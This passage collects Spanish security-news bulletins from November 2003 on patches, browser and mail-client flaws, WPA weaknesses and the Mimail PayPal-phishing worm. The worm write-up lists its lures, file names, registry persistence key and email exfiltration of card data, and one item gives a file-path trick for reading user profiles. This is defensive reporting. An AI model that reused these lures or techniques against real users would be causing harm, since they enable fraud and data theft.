La UE alumbra una agencia de 'ciberseguridad' que funcionará a partir de
enero
http://www.cincodias.com/articulo.html?d_date=20031120&xref=20031120cdscdsemp_7&type=Tes&anchor=cdsemp

La creación o no de una Agencia de Seguridad Informática de la UE será
votada mañana
http://www.delitosinformaticos.com/seguridad/noticias/106915369772081.shtml

Proposición de la Agencia de Seguridad Europea (NISA
http://www.hispasec.com/unaaldia/1589

Europe plans its own NSA to 'boost cyber-security'
http://www.theregister.co.uk/content/6/29269.html

eEurope 2002 Action Plan
http://europa.eu.int/information_society/eeurope/action_plan/pdf/actionplan_en.pdf

eEuropeTargets 2001/2002
http://europa.eu.int/information_society/eeurope/action_plan/cheap_fast_secure/secure/eu/targets_2001_2002/index_en.htm

eEurope 2005 un nuevo marco para seguridad de la información
http://www.hispasec.com/unaaldia/1313

Informe de la Comisión Europea sobre el cibercrimen
http://www.hispasec.com/unaaldia/949

miércoles, 19 de noviembre de 2003

Problemas de regresión con Internet Explorer 6.0 SP1 en Windows 2000 SP4

Microsoft anuncia de problemas de regresión cuando se instala el
Service Pack 1 para Microsoft Internet Explorer 6.0 en sistemas
Windows 2000 con Service Pack 4.

El problema de regresión surge por la eliminación de la protección del
parche publicado el pasado 4 de septiembre de 2002 para evitar un
error en la validación de Certificados realizada por los sistemas
operativos de Microsoft, que podía permitir una gran variedad de
ataques de suplantación de personalidad o saltar cualquier
autenticación basada en certificados (y que se incluía como parte del
mencionado Service Pack 4).

Por este motivo Microsoft publica una actualización del parche
destinado a evitar el error en la validación de certificados (parche
MS02-050) para los sistemas Windows 2000 SP4. Los usuarios que usen
Windows 2000 SP4 y posteriormente hayan instalado Internet Explorer
6.0 Service Pack 1, deberán aplicar el parche MS02-050 para Windows
2000 SP4 actualizado para proteger contra la menciona vulnerabilidad
en la validación de certificados.

El parche actualizado puede descargarse desde
http://www.microsoft.com/downloads/details.aspx?FamilyId=065DCA01-1F6F-4F88-AE9E-6F4636D43D9F&displaylang=en


Antonio Ropero
antonior@hispasec.com


Más información:

Microsoft Security Bulletin MS02-050
Certificate Validation Flaw Could Enable Identity Spoofing
http://www.microsoft.com/technet/security/bulletin/MS02-050.asp

una-al-dia (09/09/2002) Error en validación de certificados permite falsificación de identidad
http://www.hispasec.com/unaaldia/1415

martes, 18 de noviembre de 2003

Nuevas versiones del gusano "Mimail" roban números de tarjetas de crédito

En las últimas horas hemos podido observar desde Hispasec un aumento
significativo en los reportes de las nuevas versiones "I" y "J" del
gusano Mimail. Simulando ser un mensaje del servicio PayPal, estas
nuevas versiones solicitan al usuario datos sensibles sobre su tarjeta
de crédito. Afortunadamente es muy fácil reconocer la llegada de estos
gusanos a simple vista, ya que se distribuyen en un e-mail con el
mismo remite y asunto.

El uso de textos fijos en los campos de remitente y asunto, sin duda,
facilitará el reconocimiento a los usuarios y la tarea a los
administradores de servidores de correo que cuenten con filtros y
sistemas anti-spam. Los textos a tener en cuenta para detectar a
Mimail.I y Mimail.J son:

Remite: donotreply@paypal.com
Asunto: YOUR PAYPAL.COM ACCOUNT EXPIRES

Remite: Do_Not_Reply@paypal.com
Asunto: IMPORTANT

El cuerpo del mensaje, en inglés, solicita que debemos actualizar la
información de nuestra cuenta en PayPal o de lo contrario expirará
pasados 5 días. Para llevar a cabo el proceso de actualización, nos
pide que ejecutemos los archivos adjuntos al e-mail, que en realidad
contienen el código del gusano.

Los archivos adjuntos pueden tener los siguientes nombres:

www.paypal.com.scr
paypal.asp.scr
www.paypal.com.pif
InfoUpdate.exe

Si el usuario ejecuta el archivo adjunto el gusano infectará su
equipo, y mostrará un formulario con el logotipo de PayPal que
solicita datos sensibles de la cuenta, como número de tarjeta de
crédito, PIN, código CVV (3 dígitos de comprobación que suelen
aparecer en el reverso de la tarjeta de crédito) y fecha de
expiración.

En el caso de Mimail.J, y a diferencia de Mimail.I, una vez rellenado
ese formulario aparecerá un segundo requiriendo datos personales,
como nombre y apellidos, fecha de nacimiento, domicilio, número de
la seguridad social, etc.

Los datos que el usuario introduzca en esos formularios serán
almacenados en el archivo C:\ppinfo.sys. Posteriormente este archivo,
que contiene los datos sensibles de la tarjeta de crédito, será
enviado a diferentes cuentas de correo que definió el creador del
virus.

El gusano se instala en la carpeta de Windows bajo el nombre de
svchost32.exe y, como suele ser habitual en estos especímenes, añade
una entrada a la clave RUN del registro de Windows para asegurarse
su ejecución en cada inicio del sistema:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"SvcHost32" = [directorio de windows]\svchost32.exe

Antes de comenzar los envíos, tanto de propagación a otros usuarios
como de los datos recolectados a la cuenta del creador del virus,
el gusano comprueba si el sistema está conectado a Internet
intentando resolver el dominio www.akamai.com.

El gusano busca direcciones de correo dentro de todos los archivos
que encuentra en el sistema infectado, ignorando los archivos con
algunas de estas extensiones: avi, bmp, cab, com, dll, exe, gif,
jpg, mp3, mpg, ocx, pdf, psd, rar, tif, vxd, wav, zip. A las
direcciones encontradas les enviará el mismo mensaje con el gusano
adjunto, tal y como describimos al principio.

Adicionalmente el gusano puede escribir en el sistema otros archivos
que utiliza en los diferentes procesos, a continuación un listado
resumen:

c:\cansend.sys
c:\pp.gif (icono de paypal)
c:\pp.hta (interfaz de los formularios)
c:\ppinfo.sys (datos recopilados de la tarjeta de crédito)
[directorio de Windows]\ee98af.tmp (copia del gusano)
[directorio de Windows]\el388.tmp (direcciones e-mail)
[directorio de Windows]\svchost32.exe (copia del gusano)
[directorio de Windows]\zp3891.tmp

En el momento de escribir esta nota hay algunos antivirus que aun
no reconocen la versión de Mimail.J, si bien esperamos que en
cuestión de horas se encuentren disponibles las actualizaciones
para todos los productos.

En cualquier caso. desde Hispasec, esperamos que la incidencia de
infecciones reales causadas por estos gusanos (no confundir con
número de mensajes detectados) sea baja en países de habla hispana,
dado que el uso del servicio PayPal está más extendido en otros
países, además de que los textos con los que el propio gusano
intenta engañar a los usuarios están en inglés.


Bernardo Quintero
bernardo@hispasec.com



lunes, 17 de noviembre de 2003

Nuevo reto de hacking

Comienza el desafío "Boinas Revolutions", el III Reto de Hacking
organizado por Instituto Seguridad Internet. El objetivo de este nuevo
reto consiste en poner a prueba las habilidades de los participantes
para saltarse todo tipo de mecanismos de seguridad informática, no
sólo web.

Con una periodicidad aproximadamente mensual irán apareciendo
diferentes pruebas, de dificultad variable, desde las muy fáciles a
las de muy alto nivel. Cada prueba tendrá un único ganador, que será
el primero que consiga resolverla. Como premio, recibirá la boina
negra, seña de identidad del hacker español. Aquel que gane tres
pruebas seguidas o cinco pruebas en cualquier orden será obsequiado
además con un jamón ibérico.

Cada prueba aparecerá descrita detalladamente en el servidor Boinas
Negras y será anunciada con antelación suficiente para que todos los
concursantes puedan comenzar a participar a la vez. Todas las
soluciones deberán ir acompañadas del código fuente del programa
utilizado para superarlas o de una explicación detallada del proceso
seguido.

Tanto para participar como para optar a los premios es necesario
observar las siguientes reglas:

1.. Todos los participantes deben registrarse previamente en el
servidor de Boinas Negras. Se ha habilitado una página al efecto donde
podrá registrarse de forma totalmente gratuita todo aquel que lo desee.

2.. Cada prueba irá acompañada de unas reglas específicas que deben
aceptarse.

3.. La respuesta a cada prueba irá acompañada de una breve
descripción de cómo se ha realizado el ataque, con el nivel de detalle
suficiente como para que pueda ser reproducido por cualquier otra
persona.

4.. No se causará ningún daño al servidor atacado.

5.. Cualquier intento de ataque contra el servidor de Boinas Negras
o intento de introducir respuestas por fuerza bruta o prueba y error
supondrá la descalificación inmediata.

6.. La participación en el reto supone la aceptación de todas las
condiciones anteriores.

La fecha de inicio del reto ha coincidido con la festividad de San
Gregorio de Tours. Por supuesto, una vez iniciado el reto, continuará
abierto el proceso de registro de nuevos participantes rezagados.




Más información:

Boinas Revolutions
http://www.boinasnegras.com/revolutions/

domingo, 16 de noviembre de 2003

Características de seguridad del próximo Service Pack para Windows XP

Durante las últimas semanas, Microsoft ha revelado algunas de las
características del próximo Service Pack para Windows XP, que estará
disponible durante la primera mitad del próximo 2004.

Hace ya mucho tiempo, en septiembre del año pasado, Microsoft publicó
el único Service Pack para Windows XP disponible hasta la fecha. Se
trataba, básicamente, la recopilación de todas las actualizaciones
publicadas entre la versión original de Windows XP y la fecha de
publicación del Service Pack. No aportaba ninguna función adicional
digna de mención.

Desde la fecha de aparición de ese Service Pack, Microsoft ha
publicado un gran número de parches y hotfixes para solucionar
problemas de seguridad. Si bien los hotfixes son útiles como una
respuesta inmediata a un problema de seguridad, se convierten en un
engorro cuando debe realizarse una instalación (o reinstalación) del
sistema operativo, ya que al proceso propio de instalación y
configuración del sistema operativo y del último Service Pack
disponible, debe sumarse la instalación de los diferentes hotfixes
disponibles, algunos de los cuales no pueden instalarse de forma
simultánea y requieren reiniciar el sistema. En el momento de redactar
este boletín, mi equipo con Windows XP dispone de 34 hotfixes
posteriores al Service Pack 1.

Durante estas últimas semanas se han conocido algunos detalles acerca
de la disponibilidad durante la primera mitad del próximo año del
segundo Service Pack para Windows XP. La principal diferencia es que,
además de reunir los hotfixes, Microsoft aprovechará la publicación
del mismo para introducir importantes cambios en la configuración por
defecto del sistema operativo.

De esta forma, Windows XP pasará de ser un entorno donde predominaba
la filosofía de "todos los servicios habilitados" a uno mucho más
restringido, donde se desactivarán todos aquellos servicios que puedan
ser el origen de un problema de seguridad.

Las nuevas características de seguridad son:

* Medidas adicionales de protección de las conexiones de red

El cortafuegos ICF estará habilitado por defecto en todas las
conexiones de red. Asimismo, se ha modificado el proceso de arranque
del sistema operativo para que esté activo en un punto previo respecto
al proceso de activación de la versión actual, eliminando la ventana
de tiempo existente en la actualidad entre la activación de la
conexión de red y la disponibilidad de los servicios del cortafuegos.

Adicionalmente, ICF permitirá al usuario conocer el tráfico saliente
de su sistema (y no sólo el entrante como en la versión actual).

* Medidas de protección de la memoria

Microsoft aplicará algunas técnicas para tratar de reducir los efectos
de los desbordamientos de búfer. No obstante, estas medidas no estarán
inmediatamente al alcance de todos los usuarios, ya que requieren un
soporte hardware por parte del procesador (la capacidad de restringir
la posibilidad de ejecución de código en determinadas áreas de
memoria). En la actualidad los únicos procesadores que dan soporte a
estas características son el K8 de AMD y el Itanium de Intel, aunque
se prevé que las futuras versiones de los procesadores de 32 y 64 bits
también incluyan este mecanismo de protección. El Service Pack 2 de
Windows XP hará uso de estos mecanismos en caso de estar presentes.

* Restricciones de seguridad en el correo electrónico y en Internet
Explorer.

Otra característica nueva que aplicará el Service Pack 2 será la
activación de las restricciones de seguridad tanto en Internet
Explorer 6, en Outlook Express y en Windows Messenger. Estas
restricciones serán equivalentes a las presentes en las versiones de
sendos programas incluidas en Windows 2003 Server.


Xavier Caballé
xavi@hispasec.com


Más información:

Security Developer Center: Windows XP Service Pack 2: A Developer's
View
http://msdn.microsoft.com/security/default.aspx?pull=/library/en-us/dnwxp/html/securityinxpsp2.asp

WinInfo Short Takes: Week of Novermber 3
http://www.winnetmag.com/windowspaulthurrott/Article/ArticleID/40679/windowspaulthurrott_40679.html

Característiques del SP2 de Windows XP
http://www.quands.info/blog/2003/10/31.html#a894

Una-al-día (13-09-02): Services Packs para Internet Explorer 6.0 y
Windows XP
http://www.hispasec.com/unaaldia/1419

sábado, 15 de noviembre de 2003

Desbordamiento de búfer en servicio Estación de Trabajo

Dentro del conjunto de parches publicado por Microsoft esta semana,
se encuentra la actualización para evitar una vulnerabilidad de
desbordamiento de búfer en el servicio Estación de trabajo, que puede
permitir a un atacante remoto la ejecución de código en sistemas
Windows 2000 y Windows XP.
El servicio de Estación de trabajo de los sistemas Windows 2000 y XP
se encarga de distribuir las solicitudes del sistema de archivos local
como las de impresión en red. Este servicio determina dónde está ubicado
el recurso y, posteriormente, dirige la solicitud al sistema de archivos
local o al componente de red.

Un atacante podría aprovechar esta vulnerabilidad creando un mensaje
de red especialmente diseñado y enviándolo al servicio de Estación de
trabajo del sistema afectado. Si un atacante logra explotar la
vulnerabilidad podrá conseguir privilegios del sistema en los sistemas
afectados o provocar la caída del servicio Estación de Trabajo
(Workstation). Un atacante podrá realizar cualquier acción en el
sistema, incluida la instalación de programas, visualización de datos,
cambiar o eliminar datos, o la creación de nuevas cuentas de usuarios
con todos los privilegios.

Una forma de evitar el posible ataque consiste en filtrar o bloquear
los puertos UDP 138, 139 y 445 y los puertos TCP 138, 139 y 445 del
sistema. Estos puertos se utilizan para aceptar una conexión de llamada
a procedimiento remoto (RPC) en un equipo remoto.

Microsoft ha publicado los siguientes parches:

Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=2467FE46-D167-479C-9638-D4D79483F261&displaylang=en
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=F02DA309-4B0A-4438-A0B9-5B67414C3833&displaylang=en
Microsoft Windows XP 64-Bit Edition
http://www.microsoft.com/downloads/details.aspx?FamilyId=2BE95254-4C65-4CA5-80A5-55FDF5AA2296&displaylang=en


Antonio Ropero
antonior@hispasec.com


Más información:

Buffer Overrun in the Workstation Service Could Allow Code Execution
http://www.microsoft.com/technet/security/bulletin/MS03-049.asp

Windows Workstation Service Remote Buffer Overflow
http://www.eeye.com/html/Research/Advisories/AD20031111.html

viernes, 14 de noviembre de 2003

Desbordamiento de búfer en QualComm Eudora

Se ha descubierto una vulnerabilidad en Eudora, que podría ser
explotada potencialmente por usuarios maliciosos para comprometer el
sistema de un usuario.

Eudora es un cliente de correo clásico, desarrollado por la compañía
QualComm, y popular debido entre otras cosas a tener disponible una
versión gratuita y por no soler compartir muchas de las
vulnerabilidades que muestra su principal competidor en el mundo
Windows (Outlook de Microsoft).

El problema reside en los campos "From:" y "Reply-To:" de la cabecera,
que no son verificados de forma correcta cuando se selecciona un
"Reply-To-All". Este problema puede ser explotado para provocar un
desbordamiento de búfer construyendo un email especialmente
construido a tal efecto, con valores muy largos en dichos campos.

La explotación con éxito de este desbordamiento podría permitir
(potencialmente) la ejecución de código arbitrario en el sistema del
receptor del correo.

La vulnerabilidad ha sido confirmada en la versión 5.x del cliente de
correo, y aunque fue descubierta a principios de año, hasta marzo no
fue corregida en su versión japonesa (idioma natal del descubridor de
la vulnerabilidad), mientras que la versión en inglés ha sido
vulnerable hasta la versión 6.0 que fue publicada a principios de septiembre.

Las versiones 5.1-Jr3 (en japonés, publicada por EDGE) y 6.0 en Inglés
no presentan este fallo, por lo que se recomienda la actualización a
la mayor brevedad posible en previsión de la aparición de código de
explotación de la vulnerabilidad expuesta.

La dirección para la descarga de versiones nuevas del cliente de
correo de QualComm es la siguiente:
http://www.eudora.com/download/


Julio Canto
jcanto@hispasec.com


Más información:

Eudora "Reply-To-All" Buffer Overflow Vulnerabilty
http://www.lac.co.jp/security/english/snsadv_e/69_e.html

jueves, 13 de noviembre de 2003

Nueva actualización acumulativa para Internet Explorer

Dentro del reciente conjunto de vulnerabilidades anunciadas por
Microsoft, y del que ya hicimos un adelanto en el una-al-día de ayer,
se incluye una actualización acumulativa para Internet Explorer. Como
suele ser habitual este parche incluye todas las actualizaciones
anteriormente publicadas para Internet Explorer 5.01, Internet
Explorer 5.5, e Internet Explorer 6.0. Además, de forma adicional
este parche elimina cinco nuevas vulnerabilidades.

Tres de ellas tienen relación con el modelo se seguridad de dominios
cruzados de Internet Explorer, que impide que ventanas de diferentes
dominios compartan información. Estas vulnerabilidades pueden permitir
la ejecución de scripts en la zona de seguridad Local. Para explotar
cualquiera de estas vulnerabilidades, el atacante deberá disponer de
un sitio web malicioso con una página web creada para explotar la
vulnerabilidad particular y persuadir al usuario para visitar la
página web. El atacante también podrá crear un e-mail html diseñado
para explotar una de estas vulnerabilidades. Una vez que el usuario
visite el sitio web o el e-mail malicioso el atacante podrá acceder a
la información de otros sitios web, acceder a archivos del sistema del
usuario e incluso ejecutar código en el sistema del usuario.

Otra de las vulnerabilidades tiene relación con la forma en que la
información de la zona se para a un objeto XML dentro de Internet
Explorer. Esta vulnerabilidad puede permitir a un atacante la lectura
de archivos locales en el sistema del usuario. Para explotar esta
vulnerabilidad un atacante deberá disponer de un sitio web malicioso
con una página web creada para explotar la vulnerabilidad particular y
persuadir al usuario para visitar la página web. El atacante también
podrá crear un e-mail html diseñado para explotar esta vulnerabilidad.
Una vez que el usuario visite el sitio web o el e-mail malicioso el
usuario será preguntado para descargar un archivo html. Si el usuario
acepta la descarga de este archivo, el atacante podrá leer archivos
locales que se encuentren en una ruta conocida del sistema del
usuario.

La ultima de las vulnerabilidades corregidas está relacionada con las
operaciones de arrastrar y soltar durante eventos html dinámicos en
Internet Explorer. Esta vulnerabilidad puede permitir que si el
usuario pulsa en un enlace se grabe un archivo en una localización
destino del sistema del usuario. Al usuario no se le presenta ningún
cuadro de diálogo para que el usuario apruebe la descarga. Para
explotar esta vulnerabilidad un atacante deberá disponer de un sitio
web malicioso con una página web que contenga un enlace especialmente
creado para explotar la vulnerabilidad particular y persuadir al
usuario para visitar dicha página web. El atacante también podrá crear
un e-mail html diseñado para explotar esta vulnerabilidad. Una vez que
el usuario visite el sitio web o el e-mail malicioso el usuario y
pulse el enlace malicioso se grabará en el sistema del usuario el
código o programa que desee el atacante.

Actualizaciones publicadas:

Internet Explorer 6 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B-46C9-B6C6-12DE03860465&displaylang=en
Internet Explorer 6 Service Pack 1 (64-Bit Edition):
http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629-4E0E-BF60-24845D2D20C9&displaylang=en
Internet Explorer 6 Service Pack 1 para Windows Server 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940-48E0-B163-3FCDCB558F21&displaylang=en
Internet Explorer 6 Service Pack 1 para Windows Server 2003 (64-Bit
Edition):
http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48-4B65-989D-58B0CE1E6F95&displaylang=en
Internet Explorer 6:
http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7-4EA6-9CC2-27D104D4198E&displaylang=en
Internet Explorer 5.5 Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-DF70-448C-8925-1075C8BE6C5E&displaylang=en
Internet Explorer 5.01 Service Pack 4:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2-43A4-A1A1-676374B66517&displaylang=en
Internet Explorer 5.01 Service Pack 3:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C-4D8A-9979-3B4F540F90A8&displaylang=en
Internet Explorer 5.01 Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893-4DA4-A223-B0DE548D6D83&displaylang=en


Antonio Ropero
antonior@hispasec.com


Más información:

Cumulative Update for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms03-048.asp

miércoles, 12 de noviembre de 2003

Microsoft distribuye los parches de noviembre

Windows, Internet Explorer, Word, Excel y FrontPage, son los productos
afectados por nuevas vulnerabilidades, la mayoría consideradas
críticas porque permiten la ejecución de código arbitrario y el
compromiso del sistema por parte de terceros.

Siguiendo su nueva política de publicación de parches, consistente
en distribuirlos conjuntamente una vez al mes, Microsoft libera cuatro
nuevos parches para corregir fallos de seguridad en su software.

A la espera de poder descubrir los beneficios de esta política en el
ámbito técnico y en la seguridad real de los usuarios, inapreciables
de momento, si parece que Microsoft está consiguiendo objetivos
mediáticos y psico-sociales: la normalización de los parches.

En octubre pudimos observar que esta política consigue disminuir
considerablemente la presión mediática, ya que como cabe esperar los
medios concentraron en una misma noticia la información sobre las
siete nuevas vulnerabilidades y sus correspondientes parches.

De haber seguido Microsoft con el sistema anterior, publicando los
avisos puntualmente de forma individual, esos mismos parches podrían
haber dado lugar a siete noticias diferentes, repartidas durante todo
el mes, hablando de problemas en el software de Microsoft. Queda
claro que la publicación conjunta de parches beneficia a la imagen
del gigante de Redmon.

Por otro lado, regularizar la publicación de parches, convirtiéndolo
en algo cotidiano, es el camino más corto para que algo extraordinario
se estabilice en la normalidad.

Un ejemplo, aunque sea como efecto colateral no buscado, lo tenemos en
la normalización de las "pantallas azules" o cuelgues de Win9x. Algo
extraordinario como es el que algo tenga algún defecto y falle, a
fuerza de repetirse, se convirtió en algo común y aceptado. A nadie le
extrañaba que de forma regular un Windows 9x se colgara, hasta los
informáticos terminamos por dar la receta "es normal, reinicia, y
listo". De hecho, lo extraordinario sería que un Win9x estuviera un
mes seguido sin tener algún incidente de este tipo.

¿Imaginan este tipo de fallos en otro sector? ¿Aceptaría que su moto
o coche, recién comprados, tuviera problemas mecánicos y le dejara
tirado de vez en cuando? Así nos va con el software, la poca exigencia
del mercado es en gran parte responsable de la baja calidad de los
productos.

Volviendo a los parches de noviembre, desde Hispasec, en nuestra línea,
dedicaremos diversos boletines a la descripción detallada de los
mismos, así como cualquier otro incidente destacable que pueda
derivarse por problemas o incompatibilidades con los mismos.

A continuación un listado de las vulnerabilidades y el software
afectado, en el apartado más información puede encontrarse las
direcciones para acceder a los avisos originales de Microsoft y la
descarga de los parches.

+ Vulnerabilidades en Internet Explorer (MS03-48):

Internet Explorer 5.01, Internet Explorer 5.5,
Internet Explorer 6, Internet Explorer 6.0 para Windows Server 2003

+ Vulnerabilidad en Workstation Service (MS03-049):

Windows 2000 Advanced Server, Windows 2000 Datacenter Server,
Windows 2000 Professional, Windows 2000 Server,
Windows XP Home Edition y Windows XP Professional

+ Vulnerabilidad en Word y Excel (MS03-050):

Excel 2002, Excel 2000, Excel 97, Word 2002, Word 2000 y Word 97

+ Vulnerabilidad en las extensiones de Front Page (MS03-051):

FrontPage Server Extensions 2002, FrontPage 2000 Server Extensions,
SharePoint Team Services 2002, Windows 2000 Advanced Server,
Windows 2000 Datacenter Server, Windows 2000 Professional,
Windows 2000 Server, Windows XP Home Edition y
Windows XP Professional.


Bernardo Quintero
bernardo@hispasec.com


Más información:

MS03-48
http://www.microsoft.com/technet/security/Bulletin/MS03-048.asp

MS03-49
http://www.microsoft.com/technet/security/Bulletin/MS03-049.asp

MS03-050
http://www.microsoft.com/technet/security/Bulletin/MS03-050.asp

MS03-51
http://www.microsoft.com/technet/security/Bulletin/MS03-051.asp

Microsoft: marketing vs. seguridad
http://www.hispasec.com/unaaldia/1814

Siete nuevas vulnerabilidades/parches de Microsoft
http://www.hispasec.com/unaaldia/1816

Fallos en los parches de Microsoft
http://www.hispasec.com/unaaldia/1825

Nuevo fallo en los parches ya revisados de Microsoft
http://www.hispasec.com/unaaldia/1832

martes, 11 de noviembre de 2003

Un estudio cuestiona WPA, el nuevo estándar de seguridad para WiFi

WPA (WiFi Protected Access) es un estándar propuesto para el cifrado
de las comunicaciones inalámbricas 802.11i. Un reciente análisis de
este estándar cuestiona el nivel de seguridad, indicando que en
determinadas circunstancias puede ofrecer menos seguridad que los
sistemas actuales, como WEP, que por su parte se han demostrado como
poco seguros.

La protección de las redes inalámbricas, evitando el acceso a la red
de equipos no autorizados o evitando la interceptación de las
comunicaciones plantea serios retos. A diferencia de las redes
tradicionales, basadas en el cableado y los puntos estáticos de
conexiones, no es posible identificar desde donde conectan las
estaciones. Cualquier punto situado dentro del radio de alcance de las
ondas de radio es válido para el acceso a la red.

El protocolo 802.11, tal y como fue definido en su día, establecía una
serie de mecanismos que debían permitir la autenticación de las
estaciones que accedían a la red, así como el cifrado de las
comunicaciones. Para ello se estableció el estándar WEP (Wired
Equivalent Privacy).

WEP cifra las comunicaciones utilizando el algoritmo de cifrado RC4 y
utilizando como clave una cadena prefijada, que debe ser conocida por
los puntos de acceso de la red inalámbrica y las estaciones
autorizadas.

Diversos análisis criptográficos demostraron que WEP no podía
considerarse un mecanismo seguro, dada la debilidad del sistema de
cifrado utilizado. Así se han documentado diversos métodos para la
realización de ataques pasivos que permiten descifrar el tráfico que
circula en la red.

Para solucionar estos problemas, en la definición del protocolo
802.11i se estableció un nuevo estándar de cifrado de las
comunicaciones, WPA. Se trata de un sistema que ofrece mejores
mecanismos para el cifrado de los datos y la autenticación de los
usuarios, especialmente pensado para su integración en grandes redes.

Ahora, un estudio realizado por Robert Moskowitz, director de ICSA
Labs, indica que el sistema utilizado por WPA para el intercambio de
la información utilizada para la generación de las claves de cifrado
es muy débil.

Según este estudio, WPA en determinadas circunstancias es incluso más
inseguro que WPE. Cuando las claves preestablecidas utilizadas en WPA
utilizan palabras presentes en el diccionario y la longitud es
inferior a los 20 caracteres, el atacante sólo necesitará interceptar
el tráfico inicial de intercambio de claves. Sobre este tráfico,
realizando un ataque de diccionario, el atacante puede obtener la
clave preestablecida, que es la información necesaria para obtener
acceso a la red.

Es decir, a diferencia de WEP en que es necesario capturar un volumen
significativo de tráfico para poder identificar las claves, en WPA
únicamente capturando el tráfico de intercambio de claves para poder
realizar este ataque de diccionario.

No es un problema nuevo, pues fue apuntado durante la verificación
inicial del protocolo. Es solo una muestra que una implementación
inadecuada puede afectar negativamente cualquier sistema de cifrado.

Como hemos indicado, el problema solo es explotable bajo una serie de
circunstancias muy concretas. Este problema puntual no es, en
absoluto, una indicación de la debilidad de WPA. Únicamente es un
recordatorio de la necesidad de utilizar claves convenientemente
largas y que incluyan caracteres especiales.


Xavier Caballé
xavi@hispasec.com



lunes, 10 de noviembre de 2003

Tres nuevas vulnerabilidades en Internet Explorer

Se han descubierto tres vulnerabilidades en Internet Explorer que
permitirían a documentos HTML especialmente construidos acceder a
recursos en la Zona Local.

La primera consiste en que el uso de una doble barra ":\\" en un
localizador de recursos CODEBASE puede ser utilizado para saltarse la
comprobación de seguridad en Internet Explorer. Potencialmente, esto
podría ser explotado para forzar al Explorer a acceder a recursos
locales.

La segunda consiste en una revelación de perfil de usuario. Es posible
acceder a archivos en el perfil de usuario sin conocer el nombre de
este, sustituyéndolo con el archivo
"file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}". También es posible
ver el perfil del usuario con el siguiente javascript:







Esto puede ser explotado solo si Internet Explorer está operando en la
zona local.

La tercera se basa en que es posible forzar a Internet Explorer a que
parsee un archivo local creando un IFRAME, que tiene como SRC un
recurso remoto que redirige a un recurso local. Parsear el archivo
local requerirá que el IFRAME se refresque, lo que puede hacerse
automáticamente utilizando un script.

Se ha publicado un ejemplo de código de prueba de concepto, que
combina las vulnerabilidades arriba mencionadas con otras anteriores y
un error en el reproductor Flash. Dicho exploit es capaz de instalar y
ejecutar código arbitrario.

Las vulnerabilidades se han confirmado en IE 5, 5.5 y 6 con todos los
parches actualmente disponible.

Para paliar el problema se recomienda desactivar "Secuencias de
comando ActiveX" en todos los lugares excepto los de confianza.


Julio Canto
jcanto@hispasec.com


Más información:

Double slash moves cache from INTERNET zone to MYCOMPUTER zone
http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Content.htm

Redirection and refresh parses local file
http://www.safecenter.net/UMBRELLAWEBV4/IredirNrefresh/IredirNrefresh-Content.htm

domingo, 9 de noviembre de 2003

Denegación de servicio en OpenSSL por análisis de ASN.1

Apenas hace un mes de la publicación del parche por el problema de
análisis de ASN.1, se ha descubierto una nueva vulnerabilidad en la
misma funcionalidad de OpenSSL que puede ser explotada por usuarios
maliciosos para provocar una denegación de servicio.

Dicha vulnerabilidad se debe de nuevo a un error en el parseo de
ciertas etiquetas ASN.1, y puede ser explotada para provocar un
proceso recursivo que provoque la caída de OpenSSL. El problema,
descubierto por personal de Novell, afecta a todas las implementaciones
(por plataforma) de la versión 0.9.6k, pero el ataque de denegación
de servicio sólo funciona en Windows, que no es capaz de manejar
correctamente el proceso recursivo antes nombrado.

Se recomienda actualizar a las versiones 0.9.6l o 0.9.7c, además de
recompilar las aplicaciones que dependan de la librería vulnerable.

Las direcciones para descargar la versión 0.9.6l son las siguientes
(según método preferido de descarga):
http://www.openssl.org/source/
ftp://ftp.openssl.org/source/

Se pueden encontrar más direcciones para descarga en la siguiente
dirección:
http://www.openssl.org/source/mirror.html

Los nombres y hashes de comprobación de los archivos son los
siguientes:
openssl-0.9.6l.tar.gz (MD5: 843a65ddc56634f0e30a4f9474bb5b27)
openssl-engine-0.9.6l.tar.gz (MD5: dd372198cdf31667f2cb29cd76fbda1c)


Julio Canto
jcanto@hispasec.com


Más información:

Denial of Service in ASN.1 parsing:
http://www.openssl.org/news/secadv_20031104.txt

Vulnerabilidades en OpenSSL en el análisis de ASN.1
http://www.hispasec.com/unaaldia/1801

sábado, 8 de noviembre de 2003

Inyección SQL en Oracle Application Server

Se ha descubierto una vulnerabilidad en el servidor de aplicaciones de
Oracle9i que puede ser explotada por usuarios maliciosos para adquirir
información sensible.

El Application Server es un producto de Oracle hace de capa intermedia
y da, entre otros servicios, los medios para la creación rápida de
webs dinámicas, crear portales configurables, integrar servicios
inalámbricos, extraer 'business intelligence', etc.

La vulnerabilidad se debe a la falta de validación correcta de una
entrada en el componente Portal cuando se da la información
proporcionada por el usuario a las tablas de diccionarios de datos.
Esto puede ser explotado mediante técnicas de inyección SQL para
adquirir información sobre datos de usuarios.

Las versiones afectadas son Oracle9i Application Server Portal Release
1, v3.0.9.8.5 (y anteriores), y la v9.0.2.3.0 (y anteriores) del
Release 2. Las versiones 9.0.2.6 y posteriores no son vulnerables a
este ataque.

Se han publicado parches de actualización para las versiones
vulnerables anteriormente nombradas (Oracle recomienda encarecidamente
su aplicación a la mayor brevedad posible), y están disponibles en la
siguiente dirección:
http://metalink.oracle.com


Julio Canto
jcanto@hispasec.com


Más información:

SQL Injection Vulnerability in Oracle9i Application Server
http://otn.oracle.com/deploy/security/pdf/2003alert61.pdf

viernes, 7 de noviembre de 2003

Desbordamiento de búfer en Nullsoft SHOUTcast server

Se ha descubierto una vulnerabilidad en SHOUTcast Server que podría
